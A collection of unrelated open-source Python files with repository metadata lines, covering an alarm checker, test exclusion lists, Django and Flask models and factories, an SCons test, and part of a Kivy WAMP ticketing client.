@author: Paul Klingelhuber - [email protected]
'''
import os
import Util
import sys
import traceback
from SimpleMailer import SimpleMailer
import Config
class Alarms(object):
'''
    The Alarms class is responsible for discovering and running the alarm
    trigger checkers; it contains the alarm checking code.
'''
## this is the name of the variable which alarm trigger checkers have to include \n
## e.g.: \n
## CHECK_FOR = "cpuTimes" \n
## this has to be at the root level of an alarm trigger file
ALARM_CHECKFORNAME = "CHECK_FOR"
## the function name for the checking function \n
## e.g.:
ALARM_METHODNAME = "doCheck"
def __init__(self, oldValues=None, newValues=None):
'''
Constructor
oldData map of old values
newData map of new values
keys are what was checked (node names in xml)
values are the actual values
'''
if oldValues is None:
oldValues = {}
if newValues is None:
newValues = {}
## a dictionary of all the old values
self.oldValues = oldValues
## dictionary of all the new (current) values
self.newValues = newValues
## all alarms that were triggered
self.alarms = []
def __runAlarmCheckers(self):
'''
Runs all the alarm checker scripts found in the alarm folder.
The scripts must define a variable called CHECK_FOR which holds the
name of which item to check against
additionally a function that is called doCheck(p1, p2) and receives two
parameters, the first one will hold the value from a previous reporting
run (if there was any) and the second will hold the current value
if the function returns nothing (or None) it means no alarm is triggered
when it returns something, the string version of it will be inserted in the
alarm log
'''
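        # A minimal example of an alarm checker script (sketch; the CHECK_FOR
        # value "cpuTimes" and the threshold used here are illustrative only):
        #
        #   CHECK_FOR = "cpuTimes"
        #
        #   def doCheck(oldValue, newValue):
        #       if oldValue is not None and newValue > oldValue * 2:
        #           return "cpu time more than doubled since last report"
        #       return None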
lst = os.listdir(Util.GETPATH("./alarms"))
loadme = []
resDict = {}
for entry in lst:
if (entry.endswith(".py") and entry.find("__init__") == -1):
loadme.append(entry)
for reporter in loadme:
try:
modname = reporter[:-3]
name = "alarms." + modname
mod = Util.simpleImport(name)
checkForAttr = getattr(mod, self.ALARM_CHECKFORNAME)
oldVal = self.oldValues.get(checkForAttr, None)
newVal = self.newValues.get(checkForAttr, None)
if newVal is not None:
functionToCall = getattr(mod, self.ALARM_METHODNAME)
result = functionToCall(oldVal, newVal)
if (result is not None):
print("alarm for %s, alarm msg: %s"%(checkForAttr,result))
self.alarms.append([checkForAttr, str(result)])
else:
print("ERROR: we don't have any value for '%s', won't check"%checkForAttr)
except:
print("Unexpected error:" + str(sys.exc_info()))
print(traceback.format_exc())
return resDict
def __reportAlarms(self, systemName):
'''
if there are alarms, this will trigger the mail sending
'''
if len(self.alarms) < 1:
return
msg = '\n'.join(self.messagesOnly())
title = 'ALARMS of ' + systemName
msg = title + '\n' + msg
if Config.ALERT_EMAIL_ENABLED:
SimpleMailer().send(title, msg)
def messagesOnly(self):
for item in self.alarms:
yield item[1]
def checkForAlarms(self, systemName):
'''
call this from external code to trigger the alarm checking
'''
self.__runAlarmCheckers()
try:
self.__reportAlarms(systemName)
except:
print("Error reporting the alarms:" + str(sys.exc_info()))
print(traceback.format_exc())
| NoUsername/PyReport | PyReport/Alarms.py | Python | bsd-3-clause | 4,199 |
import os
def get_excluded_files(root):
excluded_files = [
"ert/__init__.py",
"res/analysis/enums/__init__.py",
"ert/config/__init__.py",
"res/analysis/enums/analysis_module_load_status_enum.py",
"ert/enkf/export/__init__.py",
"res/analysis/enums/analysis_module_options_enum.py",
"res/analysis/linalg.py",
"res/config/__init__.py",
"ert/enkf/enums/__init__.py",
"res/config/config_path_elm.py",
"res/config/config_error.py",
"res/__init__.py",
"ert/enkf/__init__.py",
"res/config/unrecognized_enum.py",
"res/config/schema_item.py",
"res/config/content_type_enum.py",
"res/enkf/active_list.py",
"res/enkf/__init__.py",
"res/enkf/config/__init__.py",
"res/config/config_parser.py",
"res/config/config_settings.py",
"res/enkf/analysis_iter_config.py",
"res/enkf/config/field_type_enum.py",
"res/enkf/config/custom_kw_config.py",
"res/enkf/config/ext_param_config.py",
"res/config/config_content.py",
"res/enkf/config/summary_config.py",
"res/enkf/config/field_config.py",
"res/analysis/analysis_module.py",
"res/enkf/data/__init__.py",
"res/enkf/custom_kw_config_set.py",
"res/enkf/config/gen_data_config.py",
"res/enkf/config/gen_kw_config.py",
"res/enkf/data/custom_kw.py",
"res/enkf/data/field.py",
"res/enkf/analysis_config.py",
"res/enkf/data/gen_data.py",
"res/enkf/enkf_defaults.py",
"res/enkf/data/summary.py",
"res/enkf/data/enkf_node.py",
"res/enkf/data/ext_param.py",
"res/enkf/enkf_linalg.py",
"res/enkf/data/gen_kw.py",
"res/enkf/enkf_fs.py",
"res/enkf/enkf_state.py",
"res/enkf/config/enkf_config_node.py",
"res/enkf/enums/__init__.py",
"res/enkf/ecl_config.py",
"res/enkf/enums/active_mode_enum.py",
"res/enkf/enums/enkf_fs_type_enum.py",
"res/enkf/enkf_simulation_runner.py",
"res/enkf/enums/enkf_field_file_format_enum.py",
"res/enkf/enums/enkf_init_modes_enum.py",
"res/enkf/config_keys.py",
"res/enkf/enums/enkf_obs_impl_type_enum.py",
"res/enkf/enums/enkf_run_enum.py",
"res/enkf/enums/enkf_truncation_type.py",
"res/enkf/enums/enkf_var_type_enum.py",
"res/enkf/enums/hook_runtime_enum.py",
"res/enkf/enkf_fs_manager.py",
"res/enkf/enums/gen_data_file_type_enum.py",
"res/enkf/enkf_obs.py",
"res/enkf/enums/load_fail_type_enum.py",
"res/enkf/enums/ert_impl_type_enum.py",
"res/enkf/enums/realization_state_enum.py",
"res/enkf/export/__init__.py",
"res/enkf/ert_template.py",
"res/enkf/es_update.py",
"res/enkf/export/design_matrix_reader.py",
"res/enkf/export/arg_loader.py",
"res/enkf/export/custom_kw_collector.py",
"res/enkf/export/gen_data_collector.py",
"res/enkf/ert_templates.py",
"res/enkf/ert_run_context.py",
"res/enkf/export/gen_data_observation_collector.py",
"res/enkf/export/misfit_collector.py",
"res/enkf/enkf_main.py",
"res/enkf/export/gen_kw_collector.py",
"res/enkf/forward_load_context.py",
"res/enkf/ert_workflow_list.py",
"res/enkf/export/summary_collector.py",
"res/enkf/export/summary_observation_collector.py",
"res/enkf/hook_workflow.py",
"res/enkf/local_ministep.py",
"res/enkf/local_obsdata_node.py",
"res/enkf/ensemble_config.py",
"res/enkf/local_dataset.py",
"res/enkf/local_updatestep.py",
"res/enkf/local_config.py",
"res/enkf/hook_manager.py",
"res/enkf/node_id.py",
"res/enkf/local_obsdata.py",
"res/enkf/log_config.py",
"res/enkf/observations/block_data_config.py",
"res/enkf/key_manager.py",
"res/enkf/meas_block.py",
"res/enkf/obs_block.py",
"res/enkf/meas_data.py",
"res/enkf/plot/__init__.py",
"res/enkf/observations/block_observation.py",
"res/enkf/obs_data.py",
"res/enkf/plot/data_fetcher.py",
"res/enkf/observations/gen_observation.py",
"res/enkf/observations/summary_observation.py",
"res/enkf/plot/ensemble_gen_data_fetcher.py",
"res/enkf/observations/obs_vector.py",
"res/enkf/plot/block_observation_data_fetcher.py",
"res/enkf/plot/ensemble_block_data_fetcher.py",
"res/enkf/plot/ensemble_data_fetcher.py",
"res/enkf/plot_data/__init__.py",
"res/enkf/plot/ensemble_gen_kw_fetcher.py",
"res/enkf/model_config.py",
"res/enkf/plot_data/ensemble_plot_data_vector.py",
"res/enkf/plot_data/ensemble_plot_gen_data_vector.py",
"res/enkf/plot_data/ensemble_plot_data.py",
"res/enkf/plot/observation_data_fetcher.py",
"res/enkf/plot_data/ensemble_plot_gen_data.py",
"res/enkf/plot_data/ensemble_plot_gen_kw_vector.py",
"res/enkf/plot/refcase_data_fetcher.py",
"res/enkf/plot_data/plot_block_data.py",
"res/enkf/plot_data/ensemble_plot_gen_kw.py",
"res/enkf/plot/observation_gen_data_fetcher.py",
"res/enkf/plot_data/plot_block_vector.py",
"res/enkf/plot_data/pca_plot_vector.py",
"res/enkf/plot_data/pca_plot_data.py",
"res/enkf/plot_data/plot_block_data_loader.py",
"res/enkf/rng_config.py",
"res/enkf/run_arg.py",
"res/enkf/plot/pca_fetcher.py",
"res/enkf/runpath_list.py",
"res/enkf/util/__init__.py",
"res/enkf/queue_config.py",
"res/enkf/summary_key_matcher.py",
"res/enkf/summary_key_set.py",
"res/fm/ecl/__init__.py",
"res/enkf/state_map.py",
"res/fm/ecl/script.py",
"res/fm/rms/__init__.py",
"res/fm/rms/rms_config.py",
"res/enkf/site_config.py",
"res/enkf/subst_config.py",
"res/fm/shell/__init__.py",
"res/fm/templating/__init__.py",
"res/enkf/util/time_map.py",
"res/job_queue/__init__.py",
"res/fm/templating/template_render.py",
"res/job_queue/environment_varlist.py",
"res/fm/ecl/ecl_config.py",
"res/job_queue/ert_plugin.py",
"res/job_queue/driver.py",
"res/job_queue/ext_joblist.py",
"res/job_queue/external_ert_script.py",
"res/fm/rms/rms_run.py",
"res/fm/ecl/ecl_run.py",
"res/job_queue/forward_model.py",
"res/job_queue/ert_script.py",
"res/job_queue/function_ert_script.py",
"res/fm/shell/shell.py",
"res/job_queue/job.py",
"res/job_queue/run_status_type_enum.py",
"res/job_queue/job_status_type_enum.py",
"res/job_queue/ext_job.py",
"res/job_queue/forward_model_status.py",
"res/job_queue/job_queue_node.py",
"res/job_queue/workflow_joblist.py",
"res/job_queue/job_queue_manager.py",
"res/job_queue/workflow.py",
"res/sched/history_source_enum.py",
"res/simulator/__init__.py",
"res/job_queue/workflow_runner.py",
"res/sched/history.py",
"res/sched/sched_file.py",
"res/test/synthesizer/__init__.py",
"res/simulator/batch_simulator_context.py",
"res/job_queue/queue.py",
"res/simulator/batch_simulator.py",
"res/enkf/res_config.py",
"res/test/synthesizer/perlin.py",
"res/test/ert_test_context.py",
"res/util/enums/__init__.py",
"res/job_queue/workflow_job.py",
"res/util/enums/llsq_result_enum.py",
"res/util/arg_pack.py",
"res/test/synthesizer/prime_generator.py",
"res/util/log.py",
"res/util/enums/message_level_enum.py",
"res/util/cthread_pool.py",
"res/simulator/simulation_context.py",
"res/util/res_log.py",
"res/util/res_version.py",
"res/util/path_format.py",
"res/util/stat.py",
"tests/__init__.py",
"tests/conftest.py",
"res/test/synthesizer/shaped_perlin.py",
"tests/global/test_import.py",
"tests/legacy/test_analysis.py",
"tests/ctest_run.py",
"tests/legacy/test_config.py",
"res/util/substitution_list.py",
"tests/legacy/test_sched.py",
"tests/legacy/test_job_queue.py",
"res/test/synthesizer/oil_simulator.py",
"res/util/ui_return.py",
"tests/res/analysis/test_options_enum.py",
"tests/res/analysis/test_linalg.py",
"tests/legacy/test_enkf.py",
"tests/res/analysis/test_std_enkf.py",
"tests/import_tester.py",
"tests/res/analysis/test_std_enkf_debug.py",
"res/util/matrix.py",
"tests/res/enkf/data/test_enkf_config_node.py",
"tests/res/enkf/data/test_enkf_node.py",
"tests/res/enkf/data/test_field_config.py",
"tests/res/enkf/data/test_gen_data.py",
"tests/res/analysis/test_rml.py",
"tests/res/enkf/data/test_gen_kw_config.py",
"tests/res/analysis/test_analysis_module.py",
"tests/res/enkf/data/test_custom_kw.py",
"tests/res/enkf/data/test_custom_kw_config.py",
"tests/res/enkf/data/test_gen_data_config.py",
"tests/res/enkf/data/test_summary.py",
"tests/res/enkf/export/test_arg_loader.py",
"tests/res/enkf/data/test_gen_kw_config_equinor.py",
"tests/res/enkf/export/test_gen_data_collector.py",
"tests/res/enkf/export/test_custom_kw_collector.py",
"tests/res/enkf/data/test_gen_kw.py",
"tests/res/enkf/data/test_ext_param.py",
"tests/res/enkf/export/test_misfit_collector.py",
"tests/res/enkf/export/test_gen_data_observation_collector.py",
"tests/res/enkf/plot/__init__.py",
"tests/res/enkf/export/test_gen_kw_collector.py",
"tests/res/enkf/export/test_summary_collector.py",
"tests/res/enkf/test_analysis_iter_config.py",
"tests/res/enkf/export/test_export_join.py",
"tests/res/enkf/export/test_summary_observation_collector.py",
"tests/res/enkf/test_active_list.py",
"tests/res/enkf/test_data_kw_define.py",
"tests/res/enkf/plot/test_plot_data.py",
"tests/res/enkf/export/test_design_matrix.py",
"tests/res/enkf/test_block_obs.py",
"tests/res/enkf/test_analysis_config.py",
"tests/res/enkf/test_enkf_fs.py",
"tests/res/enkf/test_custom_kw_config_set.py",
"tests/res/enkf/test_enkf_fs_manager2.py",
"tests/res/enkf/test_enkf_fs_manager1.py",
"tests/res/enkf/test_enkf_library.py",
"tests/res/enkf/test_ecl_config.py",
"tests/res/enkf/test_enkf_load_results_manually.py",
"tests/res/enkf/test_enkf_runpath.py",
"tests/res/enkf/test_ert_run_context.py",
"tests/res/enkf/test_enkf_transfer_env.py",
"tests/res/enkf/test_enkf_sim_model.py",
"tests/res/config/test_config.py",
"tests/res/enkf/test_ensemble_config.py",
"tests/res/enkf/test_forward_load_context.py",
"tests/res/enkf/test_ert_context.py",
"tests/res/enkf/test_field_config.py",
"tests/res/enkf/test_enkf.py",
"tests/res/enkf/test_hook_workflow.py",
"tests/res/enkf/test_gen_obs.py",
"tests/res/enkf/test_es_update.py",
"tests/res/enkf/test_ert_templates.py",
"tests/res/enkf/test_local_obsdata_node.py",
"tests/res/enkf/test_field_export.py",
"tests/res/enkf/test_key_manager.py",
"tests/res/enkf/test_labscale.py",
"tests/res/enkf/test_local_dataset.py",
"tests/res/enkf/test_enkf_obs.py",
"tests/res/enkf/test_hook_manager.py",
"tests/res/enkf/test_meas_block.py",
"tests/res/enkf/test_local_config.py",
"tests/res/enkf/test_meas_data.py",
"tests/res/enkf/test_obs_block.py",
"tests/res/enkf/test_queue_config.py",
"tests/res/enkf/test_log_config.py",
"tests/res/enkf/test_obs_data.py",
"tests/res/enkf/test_run_context.py",
"tests/res/enkf/test_model_config.py",
"tests/res/enkf/test_runpath_list_dump.py",
"tests/res/enkf/test_rng_config.py",
"tests/res/enkf/test_runpath_list_ert.py",
"tests/res/enkf/test_site_config.py",
"tests/res/enkf/test_simulation_batch.py",
"tests/res/enkf/test_summary_key_matcher.py",
"tests/res/enkf/test_summary_obs.py",
"tests/res/enkf/test_runpath_list.py",
"tests/res/enkf/test_summary_key_set.py",
"tests/res/enkf/test_update.py",
"tests/res/enkf/test_state_map.py",
"tests/res/enkf/test_workflow_list.py",
"tests/res/enkf/test_subst_config.py",
"tests/res/fm/test_fm_config.py",
"tests/res/fm/test_rms_config.py",
"tests/res/enkf/test_programmatic_res_config.py",
"tests/res/job_queue/test_equinor_jobmanager.py",
"tests/res/enkf/test_time_map.py",
"tests/res/job_queue/test_ert_plugin.py",
"tests/res/fm/test_ecl_config.py",
"tests/res/job_queue/test_ert_script.py",
"tests/res/fm/test_templating.py",
"tests/res/job_queue/test_function_ert_script.py",
"tests/res/job_queue/test_ext_job.py",
"tests/res/fm/test_rms_run.py",
"tests/res/fm/test_ecl_run.py",
"tests/res/job_queue/test_job_queue_manager.py",
"tests/res/job_queue/test_workflow_joblist.py",
"tests/res/enkf/test_res_config.py",
"tests/res/job_queue/test_job_queue.py",
"tests/res/job_queue/test_workflow.py",
"tests/res/sched/test_sched.py",
"tests/res/job_queue/test_workflow_job.py",
"tests/res/run/test_run.py",
"tests/res/fm/test_shell.py",
"tests/res/testcase/test_testcase.py",
"tests/res/util/test_log.py",
"tests/res/job_queue/test_workflow_runner.py",
"tests/res/testcase/test_mini_config.py",
"tests/res/testcase/test_testarea.py",
"tests/res/util/test_path_fmt.py",
"tests/res/simulator/test_simulation_context.py",
"tests/res/job_queue/workflow_common.py",
"tests/res/util/test_stat.py",
"tests/res/util/test_res_log.py",
"tests/res/util/test_substitution_list.py",
"tests/utils/__init__.py",
"tests/res/util/test_ui_return.py",
"tests/share/test_synthesizer.py",
"tests/res/job_queue/test_forward_model_formatted_print.py",
"tests/res/util/test_matrix.py",
"tests/res/simulator/test_batch_sim.py",
]
return [os.path.join(root, fname) for fname in excluded_files]
| Statoil/libres | python/tests/excluded_files.py | Python | gpl-3.0 | 14,799 |
from django.utils import six
from djsw_wrapper.router import SwaggerRouter
from djsw_wrapper.errors import SwaggerValidationError, SwaggerGenericError
import flex
import os
import re
class Swagger():
# handle is local filename, file object, string or url
def __init__(self, handle, module):
self.schema = None
self.module = None
self.loaded = False
self.handle = handle
self.models = []
self.router = None
self.models = dict()
# parse
# TODO: proper errors
try:
self.schema = flex.load(self.handle)
self.module = module
self.loaded = True
except:
raise SwaggerGenericError('Cannot process schema {} : check resource availability'.format(self.handle))
# make models for definitions
if 'definitions' in self.schema:
# make external models
for name, data in six.iteritems(self.schema['definitions']):
model = None
if 'properties' in data:
model = list() #dict()
for prop, data in six.iteritems(data['properties']):
model.append(prop)
if model:
self.models[name] = model
# make routes
if 'paths' in self.schema and 'basePath' in self.schema:
self.router = SwaggerRouter(self.schema, self.module, self.models)
else:
raise SwaggerValidationError('Schema is missing paths and/or basePath values')
# some advanced parsing techniques to be implemented
def get_schema(self):
if self.loaded:
return self.schema
else:
raise SwaggerGenericError('You should load spec file first')
def get_models(self):
if self.loaded:
return self.models
else:
raise SwaggerGenericError('You should load spec file first')
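# Usage sketch (file name and module path are illustrative):
#   spec = Swagger('swagger.yml', 'myapp.views')
#   models = spec.get_models()  # dict: definition name -> list of property names
#   router = spec.router        # SwaggerRouter built from paths/basePath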
| ErintLabs/django-openapi-gen | djsw_wrapper/core.py | Python | mit | 1,957 |
# Copyright 2012 Loris Corazza, Sakis Christakidis
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from client import Client as ComboClient
from client import startClient as startComboClient
from client import startDaemonClient as startDaemonComboClient
from client import startBasicNetClient
| schristakidis/p2ner | p2ner/components/engine/comboclient/comboclient/__init__.py | Python | apache-2.0 | 813 |
#!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Test the FindInstalledFiles() and the FindSourceFiles() functions.
"""
import os.path
import TestSCons
python = TestSCons.python
test = TestSCons.TestSCons()
test.write( "f1", "" )
test.write( "f2", "" )
test.write( "f3", "" )
test.write( 'SConstruct', r"""
env = Environment(tools=['default', 'packaging'])
prog = env.Install( 'bin/', ["f1", "f2"] )
env.File( "f3" )
src_files = sorted(map(str, env.FindSourceFiles()))
oth_files = sorted(map(str, env.FindInstalledFiles()))
print src_files
print oth_files
""")
bin_f1 = os.path.join('bin', 'f1')
bin_f2 = os.path.join('bin', 'f2')
bin__f1 = bin_f1.replace('\\', '\\\\')
bin__f2 = bin_f2.replace('\\', '\\\\')
expect_read = """\
['SConstruct', 'f1', 'f2', 'f3']
['%(bin__f1)s', '%(bin__f2)s']
""" % locals()
expect_build = """\
Install file: "f1" as "%(bin_f1)s"
Install file: "f2" as "%(bin_f2)s"
""" % locals()
expected = test.wrap_stdout(read_str = expect_read, build_str = expect_build)
test.run(stdout=expected)
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| azverkan/scons | test/packaging/convenience-functions.py | Python | mit | 2,276 |
# -*- coding: utf-8 -*-
from factory import Sequence, PostGenerationMethodCall
from factory.alchemy import SQLAlchemyModelFactory
from flaskapp.user.models import User
from flaskapp.database import db
class BaseFactory(SQLAlchemyModelFactory):
class Meta:
abstract = True
sqlalchemy_session = db.session
class UserFactory(BaseFactory):
username = Sequence(lambda n: "user{0}".format(n))
email = Sequence(lambda n: "user{0}@example.com".format(n))
password = PostGenerationMethodCall('set_password', 'example')
active = True
class Meta:
model = User
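# Usage sketch: UserFactory() creates a User with a sequential username/email,
# the password 'example' (via set_password) and active=True, attached to
# db.session; commit the session in a test if persistence is required.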
| skipallmighty/flask-app | tests/factories.py | Python | bsd-3-clause | 603 |
import hashlib
import os
from django.db import models
from django.contrib.auth.models import User
def set_questionpapername(instance, filename):
hashout = hashlib.md5()
filenamesplit = os.path.splitext(filename)
input_filename = filenamesplit[0].replace(
' ', '_').replace(',', '_').replace('.', '_')
extension = filenamesplit[1]
hashout.update(input_filename)
if len(input_filename) < 10:
outfilename = input_filename + hashout.hexdigest() + extension
else:
outfilename = input_filename[:10] + '_' + \
hashout.hexdigest() + input_filename[-10:] + extension
return os.path.join('questionpapers', outfilename)
def set_filename(instance, filename):
'''Set a unique file name to the uploaded resource before saving it'''
hashout = hashlib.md5()
filenamesplit = os.path.splitext(filename)
input_filename = filenamesplit[0].replace(
' ', '_').replace(',', '_').replace('.', '_')
extension = filenamesplit[1]
hashout.update(input_filename)
if len(input_filename) < 10:
outfilename = input_filename + hashout.hexdigest() + extension
else:
outfilename = input_filename[:10] + '_' + \
hashout.hexdigest() + input_filename[-10:] + extension
return os.path.join('resources', outfilename)
def set_profilepicturename(instance, filename):
filenamesplit = os.path.splitext(filename)
extension = filenamesplit[1]
name = instance.user.username + extension
return os.path.join('profile_pictures', name)
class Department(models.Model):
name = models.CharField(max_length=50)
abbreviation = models.CharField(max_length=10)
def __unicode__(self):
return self.name
class Profile(models.Model):
user = models.OneToOneField(User)
department = models.ForeignKey(Department)
status = models.CharField(max_length=15)
address = models.TextField()
picture = models.ImageField(upload_to=set_profilepicturename, blank=True)
bloodgroup = models.CharField(max_length=5)
phone = models.CharField(max_length=15)
def __unicode__(self):
return "Profile of " + self.user.username
class Subject(models.Model):
code = models.CharField(max_length=10, unique=True)
name = models.CharField(max_length=50)
credit = models.CharField(max_length=5)
course = models.CharField(max_length=10)
semester = models.CharField(max_length=10)
department = models.ForeignKey(Department)
staff = models.ManyToManyField(User, related_name="teachingsubjects")
students = models.ManyToManyField(User, related_name="subscribedsubjects")
description = models.TextField(max_length=5000)
def __unicode__(self):
return self.name
class Resource(models.Model):
title = models.CharField(max_length=100)
category = models.CharField(max_length=50)
subject = models.ForeignKey(Subject)
resourcefile = models.FileField(upload_to=set_filename)
uploader = models.ForeignKey(User)
def __unicode__(self):
return self.title
class Exam(models.Model):
name = models.CharField(max_length=100)
totalmarks = models.CharField(max_length=10)
time = models.CharField(max_length=10)
subject = models.ForeignKey(Subject)
questionpaper = models.FileField(upload_to=set_questionpapername)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def __unicode__(self):
return self.name
class Question(models.Model):
text = models.CharField(max_length=5000, unique=True)
module = models.IntegerField()
part = models.CharField(max_length=10)
co = models.CharField(max_length=10)
level = models.CharField(max_length=10)
exam = models.ManyToManyField(Exam)
subject = models.ForeignKey(Subject)
def __unicode__(self):
return self.text
| balasankarc/vijnana | repository/models.py | Python | gpl-3.0 | 3,885 |
"""
Test Cache decorator
@copyright: 2010-2012
@author: Joseph Tallieu <[email protected]>
@organization: Dell Inc. - PG Validation
@license: GNU LGLP v2.1
"""
# This file is part of WSManAPI.
#
# WSManAPI is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 2.1 of the License, or
# (at your option) any later version.
#
# WSManAPI is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with WSManAPI. If not, see <http://www.gnu.org/licenses/>.
import cache
@cache.lru_cache(maxsize=10)
def compute(number, second):
print number * 5 + second
if __name__ == "__main__":
compute(2, second=3)
compute(2, second=3)
compute(3, 3)
print compute.cache_info()
| jtallieu/dell-wsman-client-api-python | wsman/test_cache.py | Python | gpl-3.0 | 1,120 |
# coding=utf-8
# Copyright (c) 2015 EMC Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import unicode_literals
from storops.unity.resource import UnityResource, UnityResourceList
__author__ = 'Cedric Zhuang'
class UnityStorageResource(UnityResource):
@classmethod
def get(cls, cli, _id=None):
if not isinstance(_id, cls):
ret = cls(_id=_id, cli=cli)
else:
ret = _id
return ret
def action(self, action_name, **kwargs):
return self._cli.action(self.resource_class,
self.get_id(),
action_name,
**kwargs)
def modify_fs(self, **kwargs):
return self.action('modifyFilesystem', **kwargs)
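# Usage sketch (the id and keyword argument are illustrative; valid kwargs
# depend on the Unity REST "modifyFilesystem" action):
#   UnityStorageResource.get(cli, 'res_1').modify_fs(description='resized')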
class UnityStorageResourceList(UnityResourceList):
@classmethod
def get_resource_class(cls):
return UnityStorageResource
| emc-openstack/storops | storops/unity/resource/storage_resource.py | Python | apache-2.0 | 1,481 |
# -*- coding: iso-8859-15 -*-
"""
This is BTMS, Bigwood Ticket Management System,
just reserve, sell and print tickets....
"""
# copyright Jakob Laemmle, the GNU GENERAL PUBLIC LICENSE Version 2 license applies
# Kivy's install_twisted_reactor MUST be called early on!
from kivy.support import install_twisted_reactor
install_twisted_reactor()
from kivy.app import App
from kivy.clock import Clock
#from kivy.factory import Factory
#from kivy.properties import ObjectProperty
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.gridlayout import GridLayout
from kivy.uix.floatlayout import FloatLayout
from kivy.properties import ListProperty
from autobahn.twisted.wamp import ApplicationSession
from autobahn.twisted.wamp import ApplicationRunner
from autobahn.wamp import auth
from twisted.internet.defer import inlineCallbacks, returnValue
#from twisted.internet import defer
#import msgpack
from kivy.storage.jsonstore import JsonStore
store = JsonStore('btms_config.json')
from kivy.uix.button import Button
from kivy.uix.togglebutton import ToggleButton
from kivy.uix.image import Image
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivy.uix.bubble import Bubble
from kivy.metrics import dp
from kivy.core.audio import SoundLoader
#from plyer import notification
from kivy.uix.textinput import TextInput
from kivy.uix.progressbar import ProgressBar
from functools import partial
import hashlib
import datetime as dt
import json
from kivy.properties import ObjectProperty, ListProperty, BooleanProperty, NumericProperty
from kivy.uix.widget import Widget
class BtmsPosDispWampComponentAuth(ApplicationSession):
"""
A WAMP application component which is run from the Kivy UI.
"""
def onConnect(self):
print("connected. joining realm {} as user {} ...".format(self.config.realm, btms_user))
self.join(self.config.realm, [u"wampcra"], btms_user)
def onChallenge(self, challenge):
print("authentication challenge received: {}".format(challenge))
if challenge.method == u"wampcra":
if u'salt' in challenge.extra:
                key = auth.derive_key(btms_password.encode('utf8'),
                                      challenge.extra['salt'].encode('utf8'),
                                      challenge.extra.get('iterations', None),
                                      challenge.extra.get('keylen', None))
else:
key = btms_password.encode('utf8')
signature = auth.compute_wcs(key, challenge.extra['challenge'].encode('utf8'))
return signature.decode('ascii')
else:
raise Exception("don't know how to compute challenge for authmethod {}".format(challenge.method))
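    # Illustrative only (not part of the original app): the branch above follows
    # the WAMP-CRA scheme from autobahn.wamp.auth. A hedged sketch with made-up
    # values, assuming the router sent a salted challenge:
    #
    #   key = auth.derive_key('md5-of-password', 'some-salt',
    #                         iterations=1000, keylen=32)      # PBKDF2-derived key
    #   signature = auth.compute_wcs(key, 'challenge-string')  # HMAC over the challenge
    #
    # The router recomputes the same signature on its side and accepts or rejects
    # the join; the actual salt, iterations and keylen come from challenge.extra.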
def onJoin(self, details):
print("auth session ready", self.config.extra)
global ui
# get the Kivy UI component this session was started from
ui = self.config.extra['ui']
ui.on_session(self)
# subscribe to WAMP PubSub events and call the Kivy UI component's
# function when such an event is received
self.subscribe(ui.on_msg, u'io.crossbar.btms.pos.displays.msg.send')
self.subscribe(ui.onLeaveRemote, u'io.crossbar.btms.onLeaveRemote')
def onLeave(self, details):
print("onLeave: {}".format(details))
        if ui.logout_op == 0 or ui.logout_op is None:
ui.ids.sm.current = 'server_connect'
ui.ids.kv_user_log.text = ui.ids.kv_user_log.text + '\n' + ("onLeave: {}".format(details))
elif ui.logout_op == 1:
ui.ids.sm.current = 'login_user'
def onDisconnect(self):
details = ""
print("onDisconnect: {}".format(details))
        if ui.logout_op == 0 or ui.logout_op is None:
ui.ids.sm.current = 'server_connect'
ui.ids.kv_user_log.text = ui.ids.kv_user_log.text + '\n' + ("onDisconnect: {}".format(details))
elif ui.logout_op == 1:
ui.ids.sm.current = 'login_user'
class BtmsPosDispRoot(BoxLayout):
"""
The Root widget, defined in conjunction with the rule in btms.kv.
"""
seat_stat_img = ('images/bet_sitz_30px_01.png', 'images/bet_sitz_30px_02.png', 'images/bet_sitz_30px_03.png', 'images/bet_sitz_30px_04.png', 'images/bet_sitz_30px_05.png')
def start_wamp_component_auth(self, server_url, user, password):
global btms_user
global btms_password
btms_user = user
        btms_password = hashlib.md5(password).hexdigest()
self.logout_op = 0
"""
